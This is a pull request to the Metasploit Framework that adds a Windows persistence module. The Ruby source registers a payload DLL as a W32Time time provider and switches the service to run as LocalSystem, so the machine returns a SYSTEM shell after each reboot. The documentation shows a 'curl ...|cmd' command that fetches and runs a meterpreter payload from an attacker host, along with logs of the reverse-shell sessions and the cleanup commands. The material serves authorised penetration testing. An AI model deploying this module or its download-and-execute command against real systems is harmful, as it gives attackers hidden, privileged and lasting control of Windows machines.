### PR TITLE
Add Windows Time Provider persistence module

### DIFF
--- a/documentation/modules/exploit/windows/persistence/time_provider.md
+++ b/documentation/modules/exploit/windows/persistence/time_provider.md
@@ -1,0 +1,142 @@
+## Vulnerable Application
+This module establishes persistence by registering a malicious Time Provider DLL
+under HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\
+When the W32Time service starts or restarts, the configured payload DLL is executed.
+
+Administrator or SYSTEM privileges are required to modify registry keys. 
+
+Verified on Windows 11 24H2+.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Get an Administrator or SYSTEM meterpreter session
+3. `use exploit/windows/persistence/time_provider`
+4. `set SESSION [SESSION]`
+5. `run`
+6. Reboot the target machine
+7. You should get a new meterpreter session
+
+## Options
+
+### RESTART_SERVICE
+
+Whether to restart the W32Time service after installing persistence to trigger the payload immediately without waiting for a reboot. Default is `false`.
+
+### PAYLOAD_NAME
+
+Name of the DLL file. Defaults to a random 8 character string.
+
+### PROVIDER_NAME
+
+Name of the time provider to create. Defaults to a random 8 character string.
+
+## Scenarios
+
+### Windows 11 24H2+ (10.0 Build 26200)
+
+Get a meterpreter session
+
+```
+msf > setg verbose true
+verbose => true
+msf > set lhost 1.1.1.1
+lhost => 1.1.1.1
+msf > use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > set fetch_command CURL
+fetch_command => CURL
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > set fetch_pipe true
+fetch_pipe => true
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > to_handler 
+[*] Command served: curl -so %TEMP%\WGWpGLBzWy.exe http://1.1.1.1:8080/nCaX6BQrNbeVWy71mJdg9w & start /B %TEMP%\WGWpGLBzWy.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/tIBmwp8Cy7-zPaVZhD-bvw|cmd
+[*] Payload Handler Started as Job 0
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /nCaX6BQrNbeVWy71mJdg9w
+[*] Adding resource /tIBmwp8Cy7-zPaVZhD-bvw
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Client 2.2.2.2 requested /tIBmwp8Cy7-zPaVZhD-bvw
+[*] Sending payload to 2.2.2.2 (curl/8.19.0)
+[*] Client 2.2.2.2 requested /nCaX6BQrNbeVWy71mJdg9w
+[*] Sending payload to 2.2.2.2 (curl/8.19.0)
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60917) at 2026-06-01 01:10:23 +0200
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : TESTWIN
+OS              : Windows 11 24H2+ (10.0 Build 26200).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+
+meterpreter > getuid
+Server username: TESTWIN\user
+```
+
+Install Persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/time_provider
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/time_provider) > set session 1
+session => 1
+msf exploit(windows/persistence/time_provider) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf exploit(windows/persistence/time_provider) > set lport 4445
+lport => 4445
+msf exploit(windows/persistence/time_provider) > run
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+msf exploit(windows/persistence/time_provider) > 
+[*] Started reverse TCP handler on 1.1.1.1:4445 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Target appears vulnerable to Time Provider persistence
+[*] Writing payload to C:\Users\user\AppData\Local\Temp\aLZXRghF.dll
+[+] Payload DLL written to C:\Users\user\AppData\Local\Temp\aLZXRghF.dll
+[+] Successfully configured W32Time startup type to Automatic.
+[+] Registry key written
+[*] Meterpreter-compatible Cleanup RC file: /home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc
+```
+
+Show the persistence by rebooting the machine
+
+```
+msf exploit(windows/persistence/time_provider) > [*] 2.2.2.2 - Meterpreter session 1 closed.  Reason: Died
+
+[*] Sending stage (248902 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4445 -> 2.2.2.2:49672) at 2026-06-01 01:20:43 +0200
+```
+
+Cleanup
+
+```
+msf exploit(windows/persistence/time_provider) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > resource /home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc
+[*] Processing /home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc for ERB directives.
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> execute -f cmd.exe -a '/c taskkill /f /fi "SERVICES eq w32time"' -i -H
+Process 8300 created.
+Channel 1 created.
+SUCCESS: The process with PID 2956 has been terminated.
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> reg setval -k 'HKLM\SYSTEM\CurrentControlSet\Services\W32Time' -v 'ObjectName' -d 'NT AUTHORITY\LocalService' -t 'REG_SZ'
+Successfully set ObjectName of REG_SZ.
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> reg deletekey -k 'HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AkHjilQi'
+Successfully deleted key: HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AkHjilQi
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> reg setval -k 'HKLM\SYSTEM\CurrentControlSet\Services\W32Time' -v 'Start' -d 3 -t 'REG_DWORD'
+Successfully set Start of REG_DWORD.
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> execute -f cmd.exe -a '/c del "C:\Users\user\AppData\Local\Temp\aLZXRghF.dll"' -i -H
+Process 8816 created.
+Channel 2 created.
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> execute -f cmd.exe -a '/c net start w32time' -H
+Process 8776 created.
+meterpreter > exit
+[*] Shutting down session: 2
+```

--- a/documentation/modules/exploit/windows/persistence/time_provider.md
+++ b/documentation/modules/exploit/windows/persistence/time_provider.md
@@ -3,7 +3,7 @@ This module establishes persistence by registering a malicious Time Provider DLL
 under HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\
 When the W32Time service starts or restarts, the configured payload DLL is executed.
 
-Administrator or SYSTEM privileges are required to modify registry keys. 
+Administrator or SYSTEM privileges are required to modify registry keys.
 
 Verified on Windows 11 24H2+.
 
@@ -21,7 +21,9 @@ Verified on Windows 11 24H2+.
 
 ### RESTART_SERVICE
 
-Whether to restart the W32Time service after installing persistence to trigger the payload immediately without waiting for a reboot. Default is `false`.
+Whether to restart the W32Time service after installing
+persistence to trigger the payload immediately without
+waiting for a reboot. Default is `false`.
 
 ### PAYLOAD_NAME
 

--- a/documentation/modules/exploit/windows/persistence/time_provider.md
+++ b/documentation/modules/exploit/windows/persistence/time_provider.md
@@ -100,10 +100,12 @@ msf exploit(windows/persistence/time_provider) >
 [*] Started reverse TCP handler on 1.1.1.1:4445 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Target appears vulnerable to Time Provider persistence
+[*] W32Time is currently not running
 [*] Writing payload to C:\Users\user\AppData\Local\Temp\aLZXRghF.dll
 [+] Payload DLL written to C:\Users\user\AppData\Local\Temp\aLZXRghF.dll
 [+] Successfully configured W32Time startup type to Automatic.
 [+] Registry key written
+[*] W32Time was not running before the run; cleanup will leave it stopped.
 [*] Meterpreter-compatible Cleanup RC file: /home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc
 ```
 
@@ -132,13 +134,11 @@ resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_202606
 Successfully set ObjectName of REG_SZ.
 resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> reg deletekey -k 'HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AkHjilQi'
 Successfully deleted key: HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AkHjilQi
-resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> reg setval -k 'HKLM\SYSTEM\CurrentControlSet\Services\W32Time' -v 'Start' -d 3 -t 'REG_DWORD'
+resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> reg setval -k 'HKLM\SYSTEM\CurrentControlSet\Services\W32Time' -v 'Start' -d 4 -t 'REG_DWORD'
 Successfully set Start of REG_DWORD.
 resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> execute -f cmd.exe -a '/c del "C:\Users\user\AppData\Local\Temp\aLZXRghF.dll"' -i -H
 Process 8816 created.
 Channel 2 created.
-resource (/home/user/.msf4/logs/persistence/TESTWIN_20260601.1833/TESTWIN_20260601.1833.rc)> execute -f cmd.exe -a '/c net start w32time' -H
-Process 8776 created.
 meterpreter > exit
 [*] Shutting down session: 2
 ```

--- a/modules/exploits/windows/persistence/time_provider.rb
+++ b/modules/exploits/windows/persistence/time_provider.rb
@@ -110,11 +110,11 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # W32Time might not be configured to start at boot
-    unless service_change_startup('w32time', 'auto')
+    if service_change_startup('w32time', 'auto')
+      vprint_good('Successfully configured W32Time startup type to Automatic.')
+    else
       print_warning('Failed to configure W32Time startup flag to Automatic.')
     end
-
-    vprint_good('Successfully configured W32Time startup type to Automatic.')
 
     print_good('Registry key written')
 
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
       if service_restart('W32Time')
         print_good('W32Time service restarted successfully')
       else
-        print_warning('Unable to cleanly restart W32Time service automatically.')
+        print_warning('Unable to cleanly restart W32Time service.')
       end
     end
 

--- a/modules/exploits/windows/persistence/time_provider.rb
+++ b/modules/exploits/windows/persistence/time_provider.rb
@@ -118,7 +118,14 @@ class MetasploitModule < Msf::Exploit::Local
 
     print_good('Registry key written')
 
-    restart_w32time if datastore['RESTART_SERVICE']
+    if datastore['RESTART_SERVICE']
+      vprint_status('Attempting to restart W32Time service for immediate payload trigger...')
+      if service_restart('W32Time')
+        print_good('W32Time service restarted successfully')
+      else
+        print_warning('Unable to cleanly restart W32Time service automatically.')
+      end
+    end
 
     # 1. Stop the W32Time service
     @clean_up_rc << "execute -f cmd.exe -a '/c taskkill /f /fi \"SERVICES eq w32time\"' -i -H\n"
@@ -143,19 +150,5 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Cleaning up: removing #{reg_key} and #{payload_pathname}")
     registry_deletekey(reg_key)
     rm_f(payload_pathname)
-  end
-
-  def restart_w32time
-    print_status('Attempting to restart W32Time service for immediate payload trigger...')
-    stop_result = service_stop('W32Time')
-    start_result = service_start('W32Time')
-
-    if stop_result.zero? && start_result.zero?
-      print_good('W32Time service restarted successfully')
-    else
-      print_warning("Unable to restart W32Time cleanly (stop=#{stop_result}, start=#{start_result}).")
-    end
-  rescue Rex::Post::Meterpreter::RequestError, NoMethodError => e
-    print_warning("Failed to restart W32Time service automatically: #{e.class} #{e}")
   end
 end

--- a/modules/exploits/windows/persistence/time_provider.rb
+++ b/modules/exploits/windows/persistence/time_provider.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Local
           'Emanuele Cervelli',
         ],
         'Platform' => [ 'win' ],
-        'Arch' => [ARCH_X64, ARCH_X86],
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
         'SessionTypes' => [ 'meterpreter' ],
         'Targets' => [
           [ 'Automatic', {} ]

--- a/modules/exploits/windows/persistence/time_provider.rb
+++ b/modules/exploits/windows/persistence/time_provider.rb
@@ -1,0 +1,161 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Services
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Local::Persistence
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Time Provider Persistence',
+        'Description' => %q{
+          This module establishes persistence by registering a malicious Time Provider DLL
+          under HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\.
+          When the W32Time service starts or restarts, the configured payload DLL is executed.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Emanuele Cervelli',
+        ],
+        'Platform' => [ 'win' ],
+        'Arch' => [ARCH_X64, ARCH_X86],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [
+          [ 'Automatic', {} ]
+        ],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1209_TIME_PROVIDERS],
+          ['URL', 'https://hadess.io/the-art-of-windows-persistence/']
+        ],
+        'DefaultTarget' => 0,
+        # Date the technique was published on MITRE ATT&CK (T1209)
+        'DisclosureDate' => '2020-01-24',
+        'Notes' => {
+          'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
+      OptString.new('PROVIDER_NAME', [false, 'Name of the time provider registry key to create. Random string by default.']),
+      OptBool.new('RESTART_SERVICE', [true, 'Restart the W32Time service to trigger the payload immediately.', false])
+    ])
+  end
+
+  def check
+    return CheckCode::Unknown('Administrator or SYSTEM privileges are required') unless is_system? || is_admin?
+
+    print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
+    return CheckCode::Safe("#{writable_dir} doesn't exist") unless exists?(writable_dir)
+
+    time_service = service_info('W32Time')
+    return CheckCode::Safe('W32Time service not found') if time_service.nil?
+
+    CheckCode::Appears('Target appears vulnerable to Time Provider persistence')
+  end
+
+  def install_persistence
+    fail_with(Failure::NoAccess, 'Administrator or SYSTEM privileges are required') unless is_system? || is_admin?
+
+    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8)
+    payload_name += '.dll' unless payload_name.downcase.end_with?('.dll')
+    payload_dll = generate_payload_dll
+    payload_pathname = "#{writable_dir}\\#{payload_name}"
+
+    vprint_status("Writing payload to #{payload_pathname}")
+    fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_dll)
+    print_good("Payload DLL written to #{payload_pathname}")
+
+    provider_name = datastore['PROVIDER_NAME'] || Rex::Text.rand_text_alpha(8)
+    w32time_service_key = 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time'
+    reg_key = "#{w32time_service_key}\\TimeProviders\\#{provider_name}"
+
+    unless registry_createkey(reg_key)
+      rm_f(payload_pathname)
+      fail_with(Failure::UnexpectedReply, "Failed to create registry key: #{reg_key}")
+    end
+
+    unless registry_setvaldata(reg_key, 'DllName', payload_pathname, 'REG_EXPAND_SZ')
+      clean_up_reg(reg_key, payload_pathname)
+      fail_with(Failure::UnexpectedReply, "Failed to write registry value: #{reg_key}\\Driver")
+    end
+
+    unless registry_setvaldata(reg_key, 'Enabled', 1, 'REG_DWORD')
+      clean_up_reg(reg_key, payload_pathname)
+      fail_with(Failure::UnexpectedReply, "Failed to write registry value: #{reg_key}\\Enabled")
+    end
+
+    unless registry_setvaldata(reg_key, 'InputProvider', 1, 'REG_DWORD')
+      clean_up_reg(reg_key, payload_pathname)
+      fail_with(Failure::UnexpectedReply, "Failed to write registry value: #{reg_key}\\InputProvider")
+    end
+
+    # Elevate the Service privileges context, otherwise it will execute as Local Service
+    unless registry_setvaldata(w32time_service_key, 'ObjectName', 'LocalSystem', 'REG_SZ')
+      print_warning('Failed to alter service privileges. W32Time service will run with Local Service privileges.')
+    end
+
+    # W32Time might not be configured to start at boot
+    unless service_change_startup('w32time', 'auto')
+      print_warning('Failed to configure W32Time startup flag to Automatic.')
+    end
+
+    vprint_good('Successfully configured W32Time startup type to Automatic.')
+
+    print_good('Registry key written')
+
+    restart_w32time if datastore['RESTART_SERVICE']
+
+    # 1. Stop the W32Time service
+    @clean_up_rc << "execute -f cmd.exe -a '/c taskkill /f /fi \"SERVICES eq w32time\"' -i -H\n"
+
+    # 2. Revert the service account back to its original restricted context
+    @clean_up_rc << "reg setval -k '#{w32time_service_key}' -v 'ObjectName' -d 'NT AUTHORITY\\LocalService' -t 'REG_SZ'\n"
+
+    # 3. Remove the specific custom Time Provider key
+    @clean_up_rc << "reg deletekey -k '#{reg_key}'\n"
+
+    # 4. Revert the startup type back to Manual (Demand/Trigger Start)
+    @clean_up_rc << "reg setval -k '#{w32time_service_key}' -v 'Start' -d 3 -t 'REG_DWORD'\n"
+
+    # 4. Remove the payload binary from disk
+    @clean_up_rc << "execute -f cmd.exe -a '/c del \"#{payload_pathname}\"' -i -H\n"
+
+    # 5. Start the W32Time service
+    @clean_up_rc << "execute -f cmd.exe -a '/c net start w32time' -H\n"
+  end
+
+  def clean_up_reg(reg_key, payload_pathname)
+    print_status("Cleaning up: removing #{reg_key} and #{payload_pathname}")
+    registry_deletekey(reg_key)
+    rm_f(payload_pathname)
+  end
+
+  def restart_w32time
+    print_status('Attempting to restart W32Time service for immediate payload trigger...')
+    stop_result = service_stop('W32Time')
+    start_result = service_start('W32Time')
+
+    if stop_result.zero? && start_result.zero?
+      print_good('W32Time service restarted successfully')
+    else
+      print_warning("Unable to restart W32Time cleanly (stop=#{stop_result}, start=#{start_result}).")
+    end
+  rescue Rex::Post::Meterpreter::RequestError, NoMethodError => e
+    print_warning("Failed to restart W32Time service automatically: #{e.class} #{e}")
+  end
+end

--- a/modules/exploits/windows/persistence/time_provider.rb
+++ b/modules/exploits/windows/persistence/time_provider.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
     return CheckCode::Unknown('Administrator or SYSTEM privileges are required') unless is_system? || is_admin?
 
     print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
-    return CheckCode::Safe("#{writable_dir} doesn't exist") unless exists?(writable_dir)
+    return CheckCode::Safe("#{writable_dir} doesn't exist") unless directory?(writable_dir)
 
     time_service = service_info('W32Time')
     return CheckCode::Safe('W32Time service not found') if time_service.nil?

--- a/modules/exploits/windows/persistence/time_provider.rb
+++ b/modules/exploits/windows/persistence/time_provider.rb
@@ -127,7 +127,6 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Save the current Start value
     original_start_value = registry_getvaldata(w32time_service_key, 'Start')
-    vprint_good("Old start value: #{original_start_value}")
     if original_start_value.nil?
       print_warning("Could not read original 'Start' value for W32Time; cleanup will fall back to Manual (3).")
       original_start_value = 3

--- a/modules/exploits/windows/persistence/time_provider.rb
+++ b/modules/exploits/windows/persistence/time_provider.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Local
           'Emanuele Cervelli',
         ],
         'Platform' => [ 'win' ],
-        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Arch' => [ARCH_X64, ARCH_X86],
         'SessionTypes' => [ 'meterpreter' ],
         'Targets' => [
           [ 'Automatic', {} ]

--- a/modules/exploits/windows/persistence/time_provider.rb
+++ b/modules/exploits/windows/persistence/time_provider.rb
@@ -114,6 +114,14 @@ class MetasploitModule < Msf::Exploit::Local
       print_warning('Failed to alter service privileges. W32Time service will run with Local Service privileges.')
     end
 
+    # Save the current Start value
+    original_start_value = registry_getvaldata(w32time_service_key, 'Start')
+    vprint_good("Old start value: #{original_start_value}")
+    if original_start_value.nil?
+      print_warning("Could not read original 'Start' value for W32Time; cleanup will fall back to Manual (3).")
+      original_start_value = 3
+    end
+
     # W32Time might not be configured to start at boot
     if service_change_startup('w32time', 'auto')
       vprint_good('Successfully configured W32Time startup type to Automatic.')
@@ -142,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Local
     @clean_up_rc << "reg deletekey -k '#{reg_key}'\n"
 
     # 4. Revert the startup type back to Manual (Demand/Trigger Start)
-    @clean_up_rc << "reg setval -k '#{w32time_service_key}' -v 'Start' -d 3 -t 'REG_DWORD'\n"
+    @clean_up_rc << "reg setval -k '#{w32time_service_key}' -v 'Start' -d #{original_start_value} -t 'REG_DWORD'\n"
 
     # 4. Remove the payload binary from disk
     @clean_up_rc << "execute -f cmd.exe -a '/c del \"#{payload_pathname}\"' -i -H\n"

--- a/modules/exploits/windows/persistence/time_provider.rb
+++ b/modules/exploits/windows/persistence/time_provider.rb
@@ -71,6 +71,10 @@ class MetasploitModule < Msf::Exploit::Local
   def install_persistence
     fail_with(Failure::NoAccess, 'Administrator or SYSTEM privileges are required') unless is_system? || is_admin?
 
+    # Snapshot the service's pre-run runtime state so cleanup can restore it faithfully.
+    service_was_running = w32time_running?
+    vprint_status("W32Time is currently #{service_was_running ? 'running' : 'not running'}")
+
     payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8)
     payload_name += '.dll' unless payload_name.downcase.end_with?('.dll')
     payload_dll = generate_payload_dll
@@ -109,6 +113,13 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::UnexpectedReply, "Failed to write registry value: #{reg_key}\\InputProvider")
     end
 
+    # Save the current ObjectName (service account) so we can restore it during cleanup.
+    original_object_name = registry_getvaldata(w32time_service_key, 'ObjectName')
+    if original_object_name.nil? || original_object_name.empty?
+      print_warning("Could not read original 'ObjectName' for W32Time; cleanup will fall back to 'NT AUTHORITY\\LocalService'.")
+      original_object_name = 'NT AUTHORITY\\LocalService'
+    end
+
     # Elevate the Service privileges context, otherwise it will execute as Local Service
     unless registry_setvaldata(w32time_service_key, 'ObjectName', 'LocalSystem', 'REG_SZ')
       print_warning('Failed to alter service privileges. W32Time service will run with Local Service privileges.')
@@ -143,25 +154,37 @@ class MetasploitModule < Msf::Exploit::Local
     # 1. Stop the W32Time service
     @clean_up_rc << "execute -f cmd.exe -a '/c taskkill /f /fi \"SERVICES eq w32time\"' -i -H\n"
 
-    # 2. Revert the service account back to its original restricted context
-    @clean_up_rc << "reg setval -k '#{w32time_service_key}' -v 'ObjectName' -d 'NT AUTHORITY\\LocalService' -t 'REG_SZ'\n"
+    # 2. Revert the service account back to its original context
+    @clean_up_rc << "reg setval -k '#{w32time_service_key}' -v 'ObjectName' -d '#{original_object_name}' -t 'REG_SZ'\n"
 
     # 3. Remove the specific custom Time Provider key
     @clean_up_rc << "reg deletekey -k '#{reg_key}'\n"
 
-    # 4. Revert the startup type back to Manual (Demand/Trigger Start)
+    # 4. Revert the startup type back to Manual
     @clean_up_rc << "reg setval -k '#{w32time_service_key}' -v 'Start' -d #{original_start_value} -t 'REG_DWORD'\n"
 
-    # 4. Remove the payload binary from disk
+    # 5. Remove the payload binary from disk
     @clean_up_rc << "execute -f cmd.exe -a '/c del \"#{payload_pathname}\"' -i -H\n"
 
-    # 5. Start the W32Time service
-    @clean_up_rc << "execute -f cmd.exe -a '/c net start w32time' -H\n"
+    # 6. Restore the original run state: only restart if it was running before the run
+    if service_was_running
+      @clean_up_rc << "execute -f cmd.exe -a '/c net start w32time' -H\n"
+    else
+      vprint_status('W32Time was not running before the run; cleanup will leave it stopped.')
+    end
   end
 
   def clean_up_reg(reg_key, payload_pathname)
     print_status("Cleaning up: removing #{reg_key} and #{payload_pathname}")
     registry_deletekey(reg_key)
     rm_f(payload_pathname)
+  end
+
+  def w32time_running?
+    status = service_status('W32Time')
+    status && status[:state] == SERVICE_RUNNING
+  rescue StandardError => e
+    print_warning("Could not query W32Time run state (#{e.message}); assuming it was running.")
+    true
   end
 end

--- a/modules/exploits/windows/persistence/time_provider.rb
+++ b/modules/exploits/windows/persistence/time_provider.rb
@@ -84,6 +84,11 @@ class MetasploitModule < Msf::Exploit::Local
     w32time_service_key = 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\W32Time'
     reg_key = "#{w32time_service_key}\\TimeProviders\\#{provider_name}"
 
+    if registry_key_exist?(reg_key)
+      rm_f(payload_pathname)
+      fail_with(Failure::BadConfig, "Time provider '#{provider_name}' already exists at #{reg_key}. Pick a different PROVIDER_NAME.")
+    end
+
     unless registry_createkey(reg_key)
       rm_f(payload_pathname)
       fail_with(Failure::UnexpectedReply, "Failed to create registry key: #{reg_key}")


### PR DESCRIPTION
Adds a new persistence module that registers a custom Time Provider DLL under the W32Time service registry key. The service loads the DLL at startup, providing persistence across reboots. Requires Administrator or SYSTEM privileges.

Fixes #20825

## Verification

- [x] Start `msfconsole`
- [x] Get an Admin or SYSTEM shell
- [x] `use exploit/windows/persistence/time_provider`
- [x] `set SESSION [SESSION]`
- [x] `run`
- [x] Reboot the machine
- [x] You should get a shell

The classic technique as described in several blogs only registers the DLL under W32Time, resulting in a LocalService shell. I modified the ObjectName registry key to LocalSystem, granting an immediate SYSTEM shell upon reboot and allowing the payload to execute reliably from any directory.
